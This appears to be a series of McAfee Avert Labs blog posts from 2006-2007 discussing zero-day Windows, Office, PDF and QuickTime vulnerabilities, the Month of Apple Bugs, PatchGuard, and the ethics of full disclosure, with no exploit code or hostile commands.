With Microsoft’s next Patch Tuesday falling on February 13, these flaws will remain un-patched for at least two more weeks. So stay warm this winter, and insulate yourself from these zero-day exploits too!

This just hasn’t been a great year for the security of applications or responsible disclosure, has it. First we have the Month of Apple Bugs (which is finding a number of application-specific vulnerabilities), then we have a raft of Adobe product vulnerabilities. Now we have VeriSign offering a substantial bounty for people to poke holes in IE7 and Vista.

It seems that what we’re seeing in the malware world is also happening in the vulnerability world. Financial motivation, a vast increase in overall traffic with no one incident being particularly huge, and a general feeling of being in the Wild West. Lawlessness and vigilantism seems to be the order of the day. That doesn’t generally lead one to feel like the internet is a shiny, happy place.

But what are we to do about this? Telling people they’re naughty and need to behave, when they’re getting such notoriety or financial gain obviously isn’t going to work. Making the notoriety and money stop coming is a largely futile effort as well, it would seem. Even suing Adware makers, as an example, seems to be reasonably ineffective.

Maybe the key lies in the consumer side of the equation. Maybe as the general populace becomes more aware of what things to avoid, and what things to do to protect themselves, this will become a moot point. The glut of malware and vulnerabilities will be like flies buzzing in our ears - an academic concern rather than a constant state of emergency. I do find it hopeful that people are becoming more aware of security issues, even if we have a very long way to go yet.

For many, the Portable Document Format (PDF) has become the de-facto standard for exchanging documents. In using PDFs, some wish to sidestep the risks of malware-prone Microsoft Office documents. But with the announcement of six new PDF-related vulnerabilities in several security forums last week, we should all now be more careful with PDFs.

The first five of these new vulnerabilities have to do with the Adobe Reader plugin. Attacks that exploit these flaws may result in one of more of these results: HTTP-response splitting, cross-site scripting, session forgery, session riding, denial of service, memory corruption, or code execution. This scary list of attack results notwithstanding, a user would have to open a malicious web URL for an attack to occur. Adobe has issued Adobe Reader 8 that remedies these flaws.

The sixth new PDF vulnerability is also the sixth of the Month of Apple Bugs (MoAB) installment. If a malicious PDF document crafted to exploit this flaw were opened by a user, it would corrupt memory and could lead to code execution. Landon Fuller has posted or referred to temporary fixes for all eight MoAB flaws so far. The fix for the MoAB PDF flaw can be found here. Thank you, Landon!

Please stay secure against the PDF vulnerabilities, as we continue to protect our customers against such threats.

No, it’s not a Massive Ordnance Air Blast Bomb, thankfully. But could users of Apple software feel that it’s really that bad? January 2007 is the Month of Apple Bugs (MoAB), in which a new Apple-related vulnerability is announced for every day of the month.

The first two MoAB bugs affect Apple Quicktime and VLC Media Player respectively. If exploited, both bugs would allow remote code execution — however user interaction is needed.

MoAB is a project similar to November 2006’s Month of Kernel Bugs (MoKB). The bugs released during the MoKB affected software from a gamut of vendors, including Apple, Linux, Microsoft, NetGear, and others. In both projects, security researchers announce previously-unknown bugs in selected software in order to raise awareness about the state of security in these software products.

While many MoKB bugs remain un-patched and the software they affect remain vulnerable, Apple users affected by MoAB can thank Landon Fuller for some temporary relief. Landon, a system architect, has promised to develop unofficial patches for software affected by MoAB bugs.

The researchers at McAfee Avert Labs will continue to follow MoAB closely, so keep reading!

Well, we’ve seen the first of the promised bugs for Apple and Apple products as a part of the “Month of Apple Bugs“. And perhaps unsurprisingly, the first bug is also applicable to Windows as well, being a buffer overflow vulnerability for QuickTime. There’s also some saying that this may be rather difficult to implement.

So in short, this month of bugs that’s supposed to take Mac fans down a peg…also exposes holes in Windows. And maybe it works, maybe it doesn’t. Way to start it off with a bang, there!

As a Mac fan who realizes Apple software is written by humans just like any other software, which will inevitably have the occasional bug, perhaps I’m not the demographic they’re looking to deflate. But really, I think you’d be hard pressed to find even the most rabid Mac fan who believes Apple software is 100% bulletproof. That’s just plain deluded. I think most Mac users at this point are of the opinion that it’s more akin to the risk of mosquito bites in August at Crater Lake, versus in January at the South Pole. There’s just a lot more nasty critters flying around the Windows environs than the OS X environs for the time being.

But even from a strictly researcher perspective, I am curious to see what this month brings up, both in terms of exploits and the discussion around them. Expect to see lots more here on that subject as things progress!

Apparently not! On December 20, a new zero-day exploit for Microsoft Windows operating systems was released. This exploit targets a weakness in the Client Server Run-Time Subsystem, and allows local privilege escalation or denial of service.

Microsoft has acknowledged this vulnerability and admitted that its newest operating system, Windows Vista, is vulnerable.

Keep reading for more on exploits released this holiday season. Happy holidays!

Malware authors have been pro-active in including exploit code for almost every new vulnerability reported into bots with utmost professionalism. Apart from the numerous Microsoft windows vulnerabilities where exploit code has been methodically incorporated into bot code, McAfee Avert Labs is seeing a trend where popular applications from software vendors are being targeted. In recent weeks we have seen bots that target vulnerabilities or weak passwords in the following applications:

Famatech Remote Admin http://vil.nai.com/vil/content/v_140984.htm
Symantec Antivirus http://vil.nai.com/vil/content/v_140978.htm

Although the vulnerabilities in the above software are dated and patches available, bot authors still found them enticing enough to target machines running vulnerable versions of the these software applications.

Other popular software applications with vulnerabilities that have been targeted by bots in the recent past include:

• CA BrightStor
• Dameware
• MySQL
• WU-FTP
• VNC

Most of the major software vendors like Adobe, Microsoft and Oracle now follow a monthly patching cycle and administrators have their hands full in ensuring that every machine on the network is patched. Sadly, most administrators do not have the flexibility to deploy patches immediately to machines on the network for policy reasons. For example, the organization could be using legacy software which could break if a new service pack was applied and keeping these legacy applications running takes precedence over applying the latest hot fixes. In rare cases a fix could break something else in the operating system or adversely affect other applications. Administrators need more time to first deploy these hot fixes in a test environment and QA them properly before deploying them to the entire enterprise.

Given the trend where malware authors are expanding their attack horizon by targeting vulnerable software applications, it wouldn’t be surprising if an exploit directed at popular instant messaging (IM) clients should surface. IM is popular both in consumer and corporate networks and an exploit that gives remote shell on a machine running an instant messenger would be stunningly effective.

That being said, it will be interesting to wait, watch and revisit this topic if and when an instant messenger remote shell exploit surfaces.

Today, Avert Labs announced the availability of its podcast on the “Top Ten Security Trends in 2007”.

As part of this podcast, McAfee will identify those threats it believes businesses and consumers will face in 2007 as computer criminals become more organized and professional in their approach.

Download the podcast

Once again, in the name of “software security”, exploit code has been posted publicly that targets an unpatched Microsoft Internet Explorer (IE) vulnerability. This has been labeled as a 0-day exploit, but the first public release of this vulnerability happened on July 18, during a well known vulnerability researcher’s “Month of Browser Bugs” bloganza. The original proof of concept code posted to the blog resulted in IE crashing. The code released yesterday and today allows for the execution of arbitrary code.

I contend that a public exploit released 2+ months after the initial 0-day attack can not be considered a 0-day.

Of course in the real world, it doesn’t make much difference. As I write this blog entry, Microsoft hasn’t yet acknowledged this threat, but I suspect that we will see some information soon, only 72+ days after the 0-day attack was made public. Call it a 0-day, or call it a 72nd-day, either way users are still vulnerable.

That said, the odds of being attacked by this threat were extremely low two days ago. Now that exploit code has been served up on a platter for the bad guys to use, we can expect many attacks for some time to come.

Why is it that some vulnerability researchers feel victorious upon the release of a vendor patch, when it comes at the expense of so many innocent victims? Or maybe this really isn’t about making software more secure.

It was only a matter of time, but the first security ISV has publicly announced a product that bypasses PatchGuard. Authentium, announced today that their Authentium ESP Enterprise Platform can bypass PatchGuard. In a world where less than 1% of known threats exploit the kernel in a way that PatchGuard will block, and where only 15 of 264 (less than 6%) Microsoft vulnerabilities from 2004-2006 would have been protected by PatchGuard, according to our calculations, I’m not sure whether to laugh or cry.

Patchguard is an attempt to close a software hole with more software. As Joanna Rutkowska has amply proven, there is no software-only solution to the rootkit problem. Hardware solutions, like Intel’s Vanderpool or AMD’s Pacifica are required to harden PatchGuard to the point it cannot be broken, but they will not be widely spread in the field for years to come. And in closing one small hole, it’s opening a host of others, like those addressed by the behavioral, anti-rootkit technology, and HIPs features we, and other vendors, have been working on for years. Arguably, our solutions are not immune to this same problem, the difference being that instead of one solution from a newbie security vendor, consumers today can deploy multiple solutions from many seasoned vendors to create a layered defense strategy, even at a desktop level.

So in the meantime, MS is going to try to put their fingers in the dike of PatchGuard holes, which are more valuable to security vendors than to malware authors, who can just avoid the kernel structures MS is trying to protect. In many ways, this is the final manifestation of the logical conclusion I came to when Greg Hoglund first announced his NT rootkit: We are, and always have, been locked in an arms race with the malware authors and hackers. Microsoft has just taken away our most effective weapons.

Microsoft is putting McAfee, Authentium, Symantec, Sunbelt and the rest of the security community in the interesting position of having to tell our customers that we can’t protect them beyond a reactive AV signature without “hacking” their operating system. So if we can’t protect them, and Microsoft can’t protect them (and won’t let us), what are consumers and enterprises to do? Right now, security vendors and Microsoft are in a very public standoff. It will be interesting to see what happens when Microsoft’s own customers chime in on this issue. What do you think?

Patch Tuesday refers to the second Tuesday of each month when Microsoft releases security updates for its products. As a matter of policy, Microsoft releases patches only on Patch Tuesday. (One recent exception to this was an out-of-cycle patch for the Internet Explorer VML vulnerability.)

The researchers at McAfee Avert Labs follow Patch Tuesday with interest: Microsoft’s products are used by the lion’s share of industry and home users, and un-patched vulnerabilities in Microsoft’s products can often have an impact on global security.

Back in July 2006, Patch Tuesday fell on July 11. On July 12, a Trojan, Exploit-PPT.b, was released. This Trojan exploited a previously-unknown Microsoft PowerPoint vulnerability.

An exploit for a new vulnerability follows a Patch Tuesday. A one-time event?

This month, on 12 October 2006-two days after the October Patch Tuesday-we discovered a zero-day exploit in the wild for a new Microsoft PowerPoint 2003 vulnerability, CVE-2006-5296. Microsoft has said on its TechNet blog that this exploit could carry out code execution on the victim’s machine.

Security expert Bruce Schneier has commented that exploits might be released to follow a Patch Tuesday to maximize the “window of exposure”-the time until next month’s Patch Tuesday arrives with security patches for the new vulnerability.

Is Zero-Day Wednesday (or Thursday) going to become a trend? We’ll be watching.

To follow up on my Another Day, Another 0-day post; today (Sep 27, 2006), Microsoft has released a security advisory for this vulnerability:

Microsoft Security Advisory (925984)
Vulnerability in PowerPoint Could Allow Remote Code Execution

The following versions of PowerPoint are affected:

• PowerPoint 2000
• PowerPoint 2002
• PowerPoint 2003
• PowerPoint 2004 for Mac
• PowerPoint v. X for Mac

CVE-2006-4694 was assigned for this vulnerability on Sep 11, 2006.
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4694

As one zero day gets patched, (Microsoft released an out-of-cycle patch for the recent VML Fill vulnerability) another is found.

Today we discovered an exploit affecting Microsoft PowerPoint (preliminary testing shows Office 2000, Office XP, and Office 2003 are affected). A single target of this exploit has been identified, so like other recent Microsoft Office 0-day discoveries, it appears that this one is also a targeted attack.

What makes this attack interesting, is the fact that it appears that Microsoft’s antivirus product added detection three days ago. The only public information on these threats is the boiler plate Malicious Software Encyclopedia entries (which show an incorrect discovery date of Sep 26, when virus definition files from Sep 23 detect):

• Exploit:Win32/Controlppt.W
• Exploit:Win32/Controlppt.X

There isn’t a public advisory from Microsoft; suggesting the Microsoft’s security team knew of this in-the-wild attack but did not make the information public.

For the record, I am not a fan of full disclosure (the concept, not explicitly the mailing list). I believe that more money has been lost, more data stolen, and more illegal activity around exploits has happened because of full disclosure. Historically, those with the skills to find vulnerabilities and create exploits are not the ones who write Blaster and Sasser, etc. Generally, the people who heavily abuse exploit code have “copy & pasted” the work of others. They customize the payload and release, and in these cases damages would have been significantly reduced if it were not for the availability of exploit details.

That said, if an attack is in the wild, acknowledgment of the attack is not something to conceal. Non-disclose the nitty-gritty details, but do inform.

- Update Sep 27, 2006 9:30 -
Correction, coverage went into the 4861 DAT release.

- Update Sep 26, 2006 17:00 -
McAfee antivirus coverage for these two exploits was released earlier today in DAT version 4860; detected as Exploit-PPT.d trojan.

Thousands of websites are compromised everyday. Many end up defaced or vandalized with greetz to the hacker and flames to the system administrator for failing to maintain server security. Defacing is the lowest form of internet graffiti and is usually done for fun or attention.

More sinister is when organized crime groups use compromised web servers to host malware. The compromised web pages are modified to host zero-day exploits which compromise users via drive by downloads or can be used as staging servers for trojan downloaders to pull and push further malware. Attack script toolkits like WebAttacker are being sold on the internet and are then custom configured to infect visiting computers without any user interaction. An attacker only needs to send spam via email addresses or instant messenger messages inviting recipients to visit a compromised website hosting the vulnerability and its malware exploit.

So how does one know where the attacks will come from? What can be done to track down the bad guys and combat them? One, of many ways, is to scan the internet for vulnerable systems and then monitor the sites that are found to be vulnerable, waiting for them to be hacked. Once the site is compromised, don’t attempt to get the compromised server shutdown as that would only make the bad guys move elsewhere. Rather keep an eye on the server and monitor it for any malicious uploads and downloads.

To quote a recent example, when code for the Exploit-WMF was released, a security company was able to come up with a listing of over a hundred sites that were compromised and hosting this exploit, much faster than big search engines indexed the Internet. Critics may argue that this is akin to watching the enemy plant landmines and waiting for hapless victims to step on it because one happens to be in the business of manufacturing prosthetic limbs. The more intel that can be gathered, the better chance the security community has of shutting down the bad guys. Let us all work with the law enforcement and intel communities.

The internet is a scary place as crime increasingly becomes an omnipresent menace. The window between vulnerability discovery to its incorporation into exploit code has shrunk from months or weeks to true zero-day as attackers and security experts are perpetually in a race against time. Browser vulnerabilities and exploits such as the Exploit-VMLFill are just a prelude to a series of pending exploits that pose the fastest growing threats to internet surfing. At the time of writing, a security update to address this vulnerability is being worked upon by Microsoft and their goal is to release the update on Tuesday, October 10, 2006, or sooner.

With ever increasing browser-based attacks, it is more important than ever that users not trust seemingly familiar or safe links particularly when received via Instant Messengers, Internet Relay Chat or Email. McAfee Avert Labs is committed to continued research against all known exploits of the Vector Markup Language vulnerability and will continue to update our coverage as new attack vectors and threats emerge. The problem will not go away…. but we can sure make life difficult for the bad guys.

Last night Sunbelt blogged about a zero day IE exploit being discovered in the wild. This attack has taken shape much the way Exploit-WMF did back in December 2005. A trojan toolkit known as WebAttacker was updated to include exploiting a new Vector Markup Language Buffer Overflow vulnerability. This toolkit is known to be sold on the underground for as little as $17 US, but just like the Exploit-WMF case, we can expect exploit source to be readily available shortly.

General advice around this kind of attack is to stay on the straight and narrow path while touring the Internet. However, WebAttacker has historically been installed on compromised web servers, and we’ve seen message board posts and blog entries that include iframes to refer to other sites that are running WebAttacker. Disabling JavaSript effectively neuters known attacks. Using an alternate web browser also thwarts this attack.

Microsoft has posted an advisory including workarounds:
http://www.microsoft.com/technet/security/advisory/925568.mspx

McAfee product coverage (including proactive 0-day protection) can be found here:
Exploit information: http://vil.nai.com/vil/Content/v_140629.htm
Vulnerability information: http://vil.nai.com/vil/Content/v_vul26881.htm

P.S. As I write this entry, Exploit-WMF remains as the top most reported malware blocked by our VirusScan Online products.

McAfee Avert Labs has received samples of a new mass-mailing worm that we call http://vil.nai.com/vil/content/v_140497.htm. What makes it noteworthy is that this worm sometimes sends itself as a usual binary zipped attachment but sometimes mass-mails out Exploit-WMF with itself inside (zipped or non-zipped). The worm is packed inside a modified UPX container and is 78,336 bytes long.

The now ubiquitous WMF exploit first appeared in December 2005 and since then it was one of the most common attack vectors for home users. McAfee AV products have provided proactive detection of known malformed WMF files that can exploit the WMF vulnerability.

An epic transformation in the world of security is upon us. Today, we released the first issue of our semi-annual security magazine Sage. We will leverage this communication vehicle to deliver meaningful and sometime raw content to the masses. We take our responsibility to protect the public from malicious malcontents very seriously and will not shy away from difficult content or taboo topics. Instead, we will share with the world our day-to-day fight and let you decide how important the concepts being broached are to you.

The premiere issue examines the use of open source by the malware writing community. We show the pivotal role that code sharing and full disclosure have played in the evolution of the threat environment, and we anticipate a surge in malware quality and reliability as the malware writers become more professional. Though open source cannot be blamed for how some unsavory individuals may choose to use its tools, techniques, and methodologies, the movement should acknowledge that there are dangers associated with some of its fundamental beliefs.

Sage is meant to be a forum for thought leadership and serious discourse on topical security issues. By drawing on the Labs wealth of data and expertise, and writing challenging security articles, we hope to provoke important discussion about the digital battlefield we have found ourselves in.

Get Sage now from the McAfee Threat Center site:

http://www.mcafee.com/us/threat_center/white_paper.html